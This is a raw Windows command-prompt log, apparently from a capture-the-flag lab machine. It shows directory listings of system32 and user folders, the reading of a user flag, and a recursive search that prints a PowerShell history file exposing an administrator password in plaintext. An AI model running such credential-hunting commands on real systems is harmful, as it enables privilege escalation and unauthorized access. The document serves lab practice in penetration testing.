10/29/2018  03:37 PM         1,279,000 Taskmgr.exe
09/15/2018  12:12 AM    <DIR>          Tasks
09/15/2018  12:10 AM           535,600 taskschd.dll
09/15/2018  12:09 AM            36,864 TaskSchdPS.dll
09/15/2018  12:09 AM            42,576 tbs.dll
09/15/2018  12:09 AM           175,616 tcpipcfg.dll
09/15/2018  12:09 AM            10,240 TCPSVCS.EXE
09/15/2018  12:09 AM           625,664 tdh.dll
09/15/2018  12:12 AM    <DIR>          th-TH
09/15/2018  12:09 AM           462,336 timedate.cpl
09/15/2018  12:10 AM             9,216 TimeDateMUICallback.dll
09/15/2018  12:09 AM            25,088 timeout.exe
09/15/2018  12:09 AM            35,840 tlscsp.dll
09/15/2018  12:09 AM            34,304 tokenbinding.dll
09/15/2018  12:10 AM             3,584 TpmCertResources.dll
09/15/2018  12:10 AM           702,976 TpmCoreProvisioning.dll
09/15/2018  12:12 AM    <DIR>          tr-TR
09/15/2018  12:09 AM           376,832 tracerpt.exe
09/15/2018  12:09 AM            15,360 TRACERT.EXE
09/15/2018  12:10 AM            35,328 traffic.dll
09/15/2018  12:09 AM            17,920 tree.com
09/15/2018  12:10 AM            88,064 TrustedSignalCredProv.dll
09/15/2018  12:09 AM           177,152 tscfgwmi.dll
09/15/2018  12:09 AM            19,968 tscon.exe
09/15/2018  12:09 AM            20,480 tsdiscon.exe
09/15/2018  12:09 AM            20,992 tskill.exe
09/15/2018  12:10 AM           121,344 TSpkg.dll
09/15/2018  12:09 AM           189,952 tspubwmi.dll
09/15/2018  12:09 AM            98,304 tssdjet.dll
09/15/2018  12:09 AM            45,056 TSTheme.exe
09/15/2018  12:09 AM         1,720,936 twinapi.appcore.dll
09/15/2018  12:09 AM           499,200 twinapi.dll
09/15/2018  12:10 AM            95,744 txflog.dll
09/15/2018  12:09 AM            11,776 txfw32.dll
09/15/2018  12:09 AM            41,984 typeperf.exe
09/15/2018  12:09 AM             2,560 tzres.dll
09/15/2018  12:09 AM            48,128 tzutil.exe
09/15/2018  12:10 AM            78,336 ualapi.dll
09/15/2018  12:09 AM         1,195,640 ucrtbase.dll
09/15/2018  12:10 AM           104,960 uexfat.dll
09/15/2018  12:09 AM           139,264 ufat.dll
09/15/2018  12:10 AM         2,004,992 UIAutomationCore.dll
09/15/2018  12:09 AM            10,752 UIManagerBrokerps.dll
09/15/2018  12:12 AM    <DIR>          uk-UA
09/15/2018  12:09 AM           149,816 ulib.dll
09/15/2018  12:09 AM            34,304 unlodctr.exe
09/15/2018  12:09 AM           510,464 untfs.dll
09/15/2018  12:10 AM           164,864 updatepolicy.dll
09/15/2018  12:09 AM           681,984 uReFS.dll
09/15/2018  12:09 AM           423,424 uReFSv1.dll
09/15/2018  12:09 AM            24,064 ureg.dll
10/29/2018  03:37 PM         1,762,816 urlmon.dll
09/15/2018  12:09 AM            12,288 usbperf.dll
09/15/2018  12:09 AM             4,608 user.exe
09/15/2018  12:09 AM         1,675,200 user32.dll
09/15/2018  12:09 AM           137,056 userenv.dll
09/15/2018  12:09 AM            27,648 userinit.exe
09/15/2018  12:09 AM            16,896 userinitext.dll
09/15/2018  12:09 AM            77,824 usp10.dll
09/15/2018  12:09 AM            40,232 utildll.dll
09/15/2018  12:09 AM           139,264 uudf.dll
09/15/2018  12:09 AM            66,560 UXInit.dll
09/15/2018  12:09 AM           135,696 uxlib.dll
09/15/2018  12:09 AM            11,784 uxlibres.dll
09/15/2018  12:09 AM           481,280 uxtheme.dll
09/15/2018  12:10 AM           224,256 vaultcli.dll
09/15/2018  12:09 AM           532,480 vbscript.dll
10/10/2017  09:01 PM           404,104 vcamp140.dll
02/10/2016  10:25 PM           247,984 vccorlib120.dll
10/10/2017  09:01 PM           273,560 vccorlib140.dll
10/10/2017  09:01 PM           138,376 vcomp140.dll
10/10/2017  09:01 PM            86,840 vcruntime140.dll
09/15/2018  12:09 AM            17,920 vdmdbg.dll
09/15/2018  12:09 AM            47,616 vds_ps.dll
09/15/2018  12:09 AM           354,440 verifier.dll
09/15/2018  12:09 AM            27,328 version.dll
09/15/2018  12:09 AM            57,360 virtdisk.dll
09/04/2018  05:21 AM           190,856 vm3ddevapi.dll
09/04/2018  05:21 AM        13,202,312 vm3dgl.dll
09/04/2018  05:21 AM           143,752 vm3dglhelper.dll
09/04/2018  05:21 AM           374,152 vm3dum-debug.dll
09/04/2018  05:21 AM           374,152 vm3dum-stats.dll
09/04/2018  05:21 AM           373,640 vm3dum.dll
09/04/2018  05:21 AM           273,288 vm3dum_10-debug.dll
09/04/2018  05:21 AM           273,288 vm3dum_10-stats.dll
09/04/2018  05:21 AM           273,288 vm3dum_10.dll
09/04/2018  05:21 AM            98,184 vm3dum_loader.dll
09/04/2018  05:12 AM           303,536 vmGuestLib.dll
09/04/2018  05:12 AM            52,144 vmGuestLibJava.dll
09/15/2018  12:09 AM            43,008 vpnikeapi.dll
06/22/2018  02:31 AM            42,376 vsocklib.dll
09/15/2018  12:09 AM         1,158,656 vssapi.dll
09/15/2018  12:09 AM            53,760 vsstrace.dll
09/15/2018  12:09 AM            29,184 vss_ps.dll
09/15/2018  12:09 AM           214,016 w32tm.exe
09/15/2018  12:09 AM            28,160 w32topl.dll
09/15/2018  12:09 AM            32,768 waitfor.exe
09/15/2018  02:06 AM    <DIR>          wbem
09/15/2018  12:09 AM           406,016 wbemcomn.dll
09/15/2018  12:09 AM            88,576 wdi.dll
09/15/2018  12:09 AM           186,368 wdigest.dll
09/15/2018  12:09 AM           201,016 wdscore.dll
09/15/2018  12:09 AM           460,288 webio.dll
09/15/2018  12:09 AM           948,288 webservices.dll
09/15/2018  12:09 AM            37,376 Websocket.dll
09/15/2018  12:09 AM            55,808 wecapi.dll
09/15/2018  12:09 AM            78,336 wecutil.exe
09/15/2018  12:09 AM           680,184 wer.dll
09/15/2018  12:09 AM            35,840 werdiagcontroller.dll
09/15/2018  12:09 AM           193,800 weretw.dll
09/15/2018  12:09 AM           445,240 WerFault.exe
09/15/2018  12:09 AM           147,736 WerFaultSecure.exe
09/15/2018  12:09 AM           192,824 wermgr.exe
09/15/2018  12:09 AM           428,032 werui.dll
09/15/2018  12:09 AM           283,032 wevtapi.dll
09/15/2018  12:10 AM            76,800 wevtfwd.dll
09/15/2018  12:09 AM           187,392 wevtutil.exe
09/15/2018  12:10 AM            18,944 wfapigp.dll
09/15/2018  12:09 AM            33,280 where.exe
09/15/2018  12:09 AM            13,824 whhelper.dll
09/15/2018  12:09 AM            59,392 whoami.exe
09/15/2018  12:10 AM             2,404 WimBootCompress.ini
09/15/2018  12:10 AM           605,496 wimgapi.dll
09/15/2018  12:09 AM           320,000 win32k.sys
10/29/2018  03:37 PM         2,721,280 win32kfull.sys
09/15/2018  12:09 AM            88,304 win32u.dll
09/15/2018  12:09 AM           126,464 winbio.dll
09/15/2018  12:09 AM            32,256 winbioext.dll
09/15/2018  12:09 AM           149,488 winbrand.dll
09/15/2018  12:09 AM           332,800 wincorlib.dll
09/15/2018  12:10 AM            37,376 wincredprovider.dll
09/15/2018  12:10 AM           159,232 wincredui.dll
09/15/2018  12:09 AM           281,088 Windows.Devices.Usb.dll
09/15/2018  12:09 AM           406,528 Windows.Graphics.dll
09/15/2018  12:10 AM           127,488 Windows.Internal.UI.Logon.ProxyStub.dll
09/15/2018  12:09 AM           548,864 Windows.Networking.Connectivity.dll
09/15/2018  12:10 AM         6,302,312 windows.storage.dll
09/15/2018  12:10 AM           156,160 Windows.Storage.OneCore.dll
09/15/2018  12:09 AM            18,432 Windows.System.RemoteDesktop.dll
09/15/2018  12:10 AM           238,080 Windows.UI.CredDialogController.dll
10/29/2018  03:37 PM         1,520,208 WindowsCodecs.dll
09/15/2018  12:09 AM           886,272 windowsperformancerecordercontrol.dll
09/15/2018  12:12 AM    <DIR>          WindowsPowerShell
09/15/2018  12:09 AM           766,688 winhttp.dll
09/15/2018  12:10 AM            81,920 winhttpcom.dll
09/15/2018  12:09 AM         4,306,432 wininet.dll
09/15/2018  12:09 AM            37,176 wininitext.dll
09/15/2018  12:09 AM           354,816 winipcfile.dll
09/15/2018  12:09 AM           801,280 winipcsecproc.dll
09/15/2018  12:09 AM            69,120 winipsec.dll
09/15/2018  12:12 AM    <DIR>          WinMetadata
09/15/2018  12:09 AM           134,512 winmm.dll
09/15/2018  12:09 AM           132,392 winmmbase.dll
09/15/2018  12:09 AM         1,646,592 winmsipc.dll
09/15/2018  12:09 AM            72,192 WinMsoIrmProtector.dll
09/15/2018  12:09 AM            19,968 winnlsres.dll
09/15/2018  12:09 AM            28,352 winnsi.dll
09/15/2018  12:09 AM            67,584 WinOpcIrmProtector.dll
09/15/2018  02:06 AM    <DIR>          winrm
09/15/2018  12:09 AM                33 winrm.cmd
09/15/2018  12:09 AM           204,105 winrm.vbs
09/15/2018  12:10 AM            43,008 winrs.exe
09/15/2018  12:10 AM            95,744 winrscmd.dll
09/15/2018  12:10 AM            24,064 winrshost.exe
09/15/2018  12:10 AM             2,048 winrsmgr.dll
09/15/2018  12:10 AM            10,752 winrssrv.dll
09/15/2018  12:09 AM           178,176 WinSCard.dll
09/15/2018  12:09 AM            15,360 winshfhc.dll
09/15/2018  12:09 AM           270,336 winsku.dll
09/15/2018  12:09 AM            72,704 winsockhc.dll
09/15/2018  12:09 AM           414,720 winspool.drv
09/15/2018  12:09 AM           598,944 winsqlite3.dll
09/15/2018  12:09 AM            17,408 WINSRPC.DLL
09/15/2018  12:09 AM           256,704 winsta.dll
09/15/2018  12:09 AM           277,560 wintrust.dll
09/15/2018  12:09 AM           902,248 WinTypes.dll
09/15/2018  12:09 AM            22,016 winusb.dll
09/15/2018  12:09 AM            57,816 wkscli.dll
09/15/2018  12:09 AM           321,024 Wldap32.dll
09/15/2018  12:09 AM            82,824 wldp.dll
09/15/2018  12:09 AM             5,120 wmi.dll
09/15/2018  12:10 AM            39,936 wmiclnt.dll
09/15/2018  12:10 AM           134,656 wmidcom.dll
09/15/2018  12:10 AM           157,696 wmitomi.dll
09/15/2018  12:09 AM            15,360 wmsgapi.dll
09/15/2018  12:10 AM            28,672 WofUtil.dll
09/15/2018  12:09 AM             5,632 wow32.dll
09/15/2018  12:10 AM            15,360 wowreg32.exe
09/15/2018  12:09 AM             4,096 ws2help.dll
09/15/2018  12:09 AM           384,272 ws2_32.dll
09/15/2018  12:09 AM           147,456 wscript.exe
09/15/2018  12:09 AM           567,808 WSDApi.dll
09/15/2018  12:09 AM            21,504 wshcon.dll
09/15/2018  12:09 AM            16,384 wshelper.dll
09/15/2018  12:09 AM            80,896 wshext.dll
09/15/2018  12:09 AM            11,264 wship6.dll
09/15/2018  12:09 AM           123,392 wshom.ocx
09/15/2018  12:10 AM            15,872 wshqos.dll
09/15/2018  12:09 AM            10,752 WSHTCPIP.DLL
09/15/2018  12:10 AM            16,696 wshunix.dll
09/15/2018  12:10 AM            26,112 WsmAgent.dll
09/15/2018  12:09 AM             4,675 wsmanconfig_schema.xml
09/15/2018  12:10 AM            33,280 WSManHTTPConfig.exe
09/15/2018  12:10 AM            63,488 WSManMigrationPlugin.dll
09/15/2018  12:10 AM           141,824 WsmAuto.dll
09/15/2018  12:10 AM            11,776 wsmplpxy.dll
09/15/2018  12:10 AM            39,424 wsmprovhost.exe
09/15/2018  12:09 AM             1,559 WsmPty.xsl
09/15/2018  12:10 AM            61,952 WsmRes.dll
09/15/2018  12:09 AM           121,344 Wsmselpl.dll
09/15/2018  12:09 AM             2,560 Wsmselrr.dll
09/15/2018  12:10 AM         2,465,792 WsmSvc.dll
09/15/2018  12:09 AM             2,426 WsmTxt.xsl
09/15/2018  12:10 AM           230,400 WsmWmiPl.dll
09/15/2018  12:09 AM            52,736 wsnmp32.dll
09/15/2018  12:09 AM            16,384 wsock32.dll
09/15/2018  12:09 AM         1,522,688 wsp_fs.dll
09/15/2018  12:09 AM         1,308,672 wsp_health.dll
09/15/2018  12:09 AM           718,336 wsp_sr.dll
09/15/2018  12:09 AM            52,864 wtsapi32.dll
09/15/2018  12:10 AM           854,016 wuapi.dll
09/15/2018  12:10 AM            71,680 wudriver.dll
09/15/2018  12:10 AM            31,232 wups.dll
09/15/2018  12:10 AM           305,664 wusa.exe
09/15/2018  12:09 AM            44,032 xcopy.exe
09/15/2018  12:09 AM            52,736 xmlfilter.dll
09/15/2018  12:09 AM           173,208 xmllite.dll
09/15/2018  12:09 AM            52,224 xolehlp.dll
09/15/2018  12:12 AM    <DIR>          zh-CN
09/15/2018  12:12 AM    <DIR>          zh-TW
            1244 File(s)    358,645,583 bytes
              80 Dir(s)  33,824,833,536 bytes free

C:\Windows\system32>cd ..

C:\Windows>cd ..

C:\>dir
 Volume in drive C has no label.
 Volume Serial Number is CE13-2325

 Directory of C:\

01/20/2020  05:20 AM    <DIR>          backups
09/15/2018  12:12 AM    <DIR>          PerfLogs
01/19/2020  04:09 PM    <DIR>          Program Files
01/19/2020  04:08 PM    <DIR>          Program Files (x86)
01/19/2020  11:39 PM    <DIR>          Users
08/10/2021  10:07 AM    <DIR>          Windows
               0 File(s)              0 bytes
               6 Dir(s)  33,824,833,536 bytes free

C:\>cd Users

C:\Users>dir
 Volume in drive C has no label.
 Volume Serial Number is CE13-2325

 Directory of C:\Users

01/19/2020  04:10 PM    <DIR>          .
01/19/2020  04:10 PM    <DIR>          ..
01/19/2020  11:39 PM    <DIR>          Administrator
01/19/2020  11:39 PM    <DIR>          Public
01/20/2020  06:01 AM    <DIR>          sql_svc
               0 File(s)              0 bytes
               5 Dir(s)  33,824,833,536 bytes free

C:\Users>cd Administratior
The system cannot find the path specified.

C:\Users>cd sql_svc

C:\Users\sql_svc>dir
 Volume in drive C has no label.
 Volume Serial Number is CE13-2325

 Directory of C:\Users\sql_svc

01/20/2020  06:01 AM    <DIR>          .
01/20/2020  06:01 AM    <DIR>          ..
01/20/2020  06:01 AM    <DIR>          3D Objects
01/20/2020  06:01 AM    <DIR>          Contacts
01/20/2020  06:42 AM    <DIR>          Desktop
01/20/2020  06:01 AM    <DIR>          Documents
01/20/2020  06:01 AM    <DIR>          Downloads
01/20/2020  06:01 AM    <DIR>          Favorites
01/20/2020  06:01 AM    <DIR>          Links
01/20/2020  06:01 AM    <DIR>          Music
01/20/2020  06:01 AM    <DIR>          Pictures
01/20/2020  06:01 AM    <DIR>          Saved Games
01/20/2020  06:01 AM    <DIR>          Searches
01/20/2020  06:01 AM    <DIR>          Videos
               0 File(s)              0 bytes
              14 Dir(s)  33,824,813,056 bytes free

C:\Users\sql_svc>cd Desktop

C:\Users\sql_svc\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is CE13-2325

 Directory of C:\Users\sql_svc\Desktop

01/20/2020  06:42 AM    <DIR>          .
01/20/2020  06:42 AM    <DIR>          ..
02/25/2020  07:37 AM                32 user.txt
               1 File(s)             32 bytes
               2 Dir(s)  33,824,813,056 bytes free

C:\Users\sql_svc\Desktop>type user.tt
The system cannot find the file specified.

C:\Users\sql_svc\Desktop>type user.txt
3e7b102e78218e935bf3f4951fec21a3
C:\Users\sql_svc\Desktop>dir\s *history.txt
 Volume in drive C has no label.
 Volume Serial Number is CE13-2325

 Directory of C:\

File Not Found

 Directory of C:\Users\sql_svc\Desktop

File Not Found

C:\Users\sql_svc\Desktop>cd ../../..

C:\>dir\s *history.txt
 Volume in drive C has no label.
 Volume Serial Number is CE13-2325

 Directory of C:\


 Directory of C:\

File Not Found

C:\>dir/s *history.txt
 Volume in drive C has no label.
 Volume Serial Number is CE13-2325

 Directory of C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine

03/17/2020  02:36 AM                79 ConsoleHost_history.txt
               1 File(s)             79 bytes

     Total Files Listed:
               1 File(s)             79 bytes
               0 Dir(s)  33,824,755,712 bytes free

C:\>cd C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine

C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine>dir
 Volume in drive C has no label.
 Volume Serial Number is CE13-2325

 Directory of C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine

01/20/2020  06:04 AM    <DIR>          .
01/20/2020  06:04 AM    <DIR>          ..
03/17/2020  02:36 AM                79 ConsoleHost_history.txt
               1 File(s)             79 bytes
               2 Dir(s)  33,824,755,712 bytes free

C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine>type ConsoleHost_history.txt
net.exe use T: \\Archetype\backups /user:administrator MEGACORP_4dm1n!!
exit

C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine>